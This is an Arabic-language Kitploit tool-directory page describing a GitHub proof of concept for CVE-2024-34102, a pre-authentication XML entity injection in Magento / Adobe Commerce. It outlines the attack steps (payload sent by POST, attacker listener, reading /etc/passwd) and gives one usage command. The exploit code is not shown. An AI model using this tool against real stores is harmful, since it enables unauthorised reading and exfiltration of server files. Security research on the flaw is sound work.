Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-34102 — إثبات المفهوم لـ CVE-2024-34102. مشكلة حقن كيان XML قبل المصادقة في Magento / Adobe Commerce. | Kitploit
أدوات/GitHubGitHub/bigb0x/cve-2024-34102
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليم
GitHubbigb0x/cve-2024-34102

CVE-2024-34102

إثبات المفهوم لـ CVE-2024-34102. مشكلة حقن كيان XML قبل المصادقة في Magento / Adobe Commerce.

عرض المستودع
31131منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-34102

POC لـ CVE-2024-34102. مشكلة حقن كيان XML قبل المصادقة في Magento / Adobe Commerce.

Banner

نظرة عامة

سيحاول هذا POC قراءة الملفات من المضيفين المستهدفين المعرضين للثغرة الأخيرة في Magento / Adobe Commerce CVE-2024-34102. يعتمد هذا POC على هذا التنبيه الأمني وهذا البحث من Assetnote.

كيفية الاستخدام

لتشغيل هذا الـ POC، يجب أن يكون لديك جهاز بعنوان IP منشور وقابل للوصول.

ما يفعله هذا الـ POC

  1. إنشاء ملف محلي poc.xml يحتوي على الحمولات الرئيسية.
  2. إرسال الحمولة إلى الهدف عبر طلب POST.
  3. إعداد مستمع على جهازك لطلبات GET الواردة من الهدف.
  4. محاولة قراءة الملفات من الهدف (الافتراضي: /etc/passwd).

الحد الأدنى من المتطلبات

  • بايثون 3.6 أو أعلى
  • مكتبة requests

لاستخدام هذا الـ POC ضد هدف واحد:

root@kitploit:~
python cve-2024-34102.py -u target -ip your-machine-ip -p any-open-port-in-your-machine -r file-to-read-from-target (default is /etc/passwd)

تواصل

لأي اقتراحات أو أفكار، يرجى التواصل معي.

إخلاء مسؤولية

هذه الأداة المقدمة هي لأغراض تعليمية فقط. لا أشجع أو أقر أو أدعم الوصول غير المصرح به إلى أي نظام أو شبكة. استخدم هذه الأداة بمسؤولية وفقط على الأنظمة التي لديك إذن صريح لاختبارها. أي إجراءات وعواقب ناتجة عن سوء استخدام هذه الأداة هي مسؤوليتك وحدك.

المراجع

  • https://github.com/spacewasp/public_docs/blob/main/CVE-2024-34102.md
  • https://www.assetnote.io/resources/research/why-nested-deserialization-is-harmful-magento-xxe-cve-2024-34102
تنزيل الأداة